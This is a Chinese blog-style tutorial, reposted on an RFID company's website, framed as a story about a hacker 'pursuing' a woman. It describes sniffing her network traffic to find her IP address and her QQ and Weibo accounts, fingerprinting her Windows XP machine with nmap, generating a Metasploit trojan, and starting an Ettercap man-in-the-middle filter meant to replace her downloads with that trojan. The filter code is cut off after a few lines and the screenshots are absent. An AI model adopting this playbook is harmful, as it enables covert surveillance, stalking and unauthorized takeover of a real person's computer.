返回首页
搜 索
400-77-456-22
英米加集团
领先RFID产品与物联网解决方案专家
INMIGA group
智慧城市
智能交通
姿势学习:屌丝黑客”追”妹记
来源:英米加集团 | 作者:inmiga | 发布时间: 3563天前 | 2258 次浏览 | 分享到:

  最简单的方法就是去问?(显然不可能,妹子又不傻)

  现在如果妹子在各种浏览什么网页,也许可以通过嗅探数据得到到底那一台是妹子的电脑。

  0nly打开了wireshark进行了抓包嗅探,因为好多个主机有大量的数据包,所以分析数据是很费时费力的,Only一直在盯着妹子,好像在等待什么,突然他又露出了那诡异的笑容...

  “就是这个”

  我们都凑过去看


姿势学习:屌丝黑客”追”妹记-安全盒子

 

  “你怎么知道的”

  “刚她登录邮箱发邮件了”

  Only你可真是屌丝啊,I服了you!

  确定了妹子的IP地址是 192.168.169.131

  从嗅探中Only得知了妹子经常会用QQ邮箱发邮件和上微博,知道了妹子的QQ号和微博号

  这还不够让Only满足,他打开nmap探测了下妹子的操作系统


姿势学习:屌丝黑客”追”妹记-安全盒子

 

  居然用的XP,那可以用ettercap进行欺骗然后挂马了

  这样就可以获得妹子的主机权限了

  Only用metasploit(神器)生成了一个木马


姿势学习:屌丝黑客”追”妹记-安全盒子

 


姿势学习:屌丝黑客”追”妹记-安全盒子

 


姿势学习:屌丝黑客”追”妹记-安全盒子

 


姿势学习:屌丝黑客”追”妹记-安全盒子

 

  Only打开了ettercap准备进行中间人攻击

  首先新建一个规则

  1

  2

  3

  4

  5

  6

  7

  8

  9

  10

  11

  12

  13

  14

  15

  16

  17

  18

  19

  20

  21

  22

  23

  24

  25

  26

  27

  28

  29

  30

  31

  32

  33

  34

  35

  36

  37

  38

  39

  40


# replace rmccurdy with

  your website

  # replace the url with what ever exe you like

if

  (ip.proto == TCP && tcp.dst == 80) {

电力能源
农林牧渔
航空航天
精益制造
快消零售
智能港口
司法监狱
仓储物流
安监消防
金融通信